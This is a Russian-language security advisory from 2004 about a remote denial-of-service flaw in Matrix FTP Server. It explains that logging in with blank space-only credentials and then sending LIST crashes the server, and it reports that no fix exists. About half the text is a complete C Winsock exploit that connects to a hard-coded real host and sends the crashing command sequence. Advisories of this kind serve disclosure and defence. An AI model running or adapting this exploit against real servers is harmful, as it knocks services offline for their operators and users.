Security Lab

Удаленный отказ в обслуживании против Matrix FTP Server

Дата публикации:11.02.2004
Всего просмотров:1406
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Matrix FTP Server

Описание: Уязвимость обнаружена в Matrix FTP Server. Удаленный пользователь может аварийно завершить работу FTp сервера.

Удаленный пользователь может войти в систему со специально обработанным именем пользователя и паролем (4 пробела для имени пользователя и 4 пробела для пароля) и затем послать FTP LIST команду, чтобы аварийно завершить работу FTP сервера.

Пример/Эксплоит:


//===========================================================
#include <winsock2.h>
#include "stdio.h"
#include "conio.h"

#pragma comment(lib, "ws2_32.lib")

void main()
 
        WSADATA W;
        SOCKET Sock;
        struct sockaddr_in Saddr;
        int res,err;

        char text[1024]={' '};
        err = WSAStartup( 0x101, &W );
        if(err!=0) return;
	Sock=socket(AF_INET,SOCK_STREAM,0);
	Saddr.sin_family=AF_INET;
	Saddr.sin_port=htons(21);
	hostent *H=gethostbyname("ftp.fasthost.co.uk");
	Saddr.sin_addr.s_addr= *((unsigned long *) H->h_addr);
	printf("Connecting to server..\n");
	res=connect(Sock,(sockaddr*)&Saddr,sizeof(Saddr));
	if (res!=0) return;

    	res=recv(Sock,text,1024,0);
        printf(text);

    	strcpy(text,"USER    \r\n");
      	res=send(Sock,text,strlen(text),0);
		printf(text);

    	res=recv(Sock,text,1024,0);
        printf(text);

        strcpy(text,"PASS    \r\n");
    	res=send(Sock,text,strlen(text),0);
		printf(text);

        res=recv(Sock,text,1024,0);
        printf(text);

        strcpy(text,"LIST\r\n");
    	res=send(Sock,text,strlen(text),0);
		printf(text);

        res=recv(Sock,text,1024,0);
        printf(text);

	    closesocket(Sock);

return;

URL производителя: http://www.matrix-servers.com/index.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Matrix FTP Server" may be crashed after logining send LIST command.